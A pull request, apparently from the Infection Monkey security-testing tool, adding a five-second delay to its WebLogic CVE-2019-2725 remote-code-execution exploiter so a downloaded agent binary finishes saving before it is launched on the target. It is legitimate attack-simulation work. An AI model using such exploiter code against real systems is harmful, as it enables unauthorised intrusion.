### PR TITLE
Delay in weblogic to make exploiter more reliable

### DIFF
--- a/monkey/infection_monkey/exploit/weblogic.py
+++ b/monkey/infection_monkey/exploit/weblogic.py
@@ -252,6 +252,7 @@ class WebLogic201710271(WebRCE):
 # https://github.com/rapid7/metasploit-framework/pull/11780
 class WebLogic20192725(WebRCE):
     URLS = ["_async/AsyncResponseServiceHttps"]
+    DELAY_BEFORE_EXPLOITING_SECONDS = 5
 
     _TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
     _EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
@@ -265,6 +266,11 @@ class WebLogic20192725(WebRCE):
         exploit_config['blind_exploit'] = True
         exploit_config['dropper'] = True
         return exploit_config
+
+    def execute_remote_monkey(self, url, path, dropper=False):
+        # Without delay exploiter tries to launch monkey file that is still finishing up after downloading.
+        time.sleep(WebLogic20192725.DELAY_BEFORE_EXPLOITING_SECONDS)
+        super(WebLogic20192725, self).execute_remote_monkey(url, path, dropper)
 
     def exploit(self, url, command):
         if 'linux' in self.host.os['type']:


### PR DESCRIPTION
# Feature / Fixes
> Weblogic exploiter made more reliable with delay that fixes race condition between saving monkey binary and launching it.
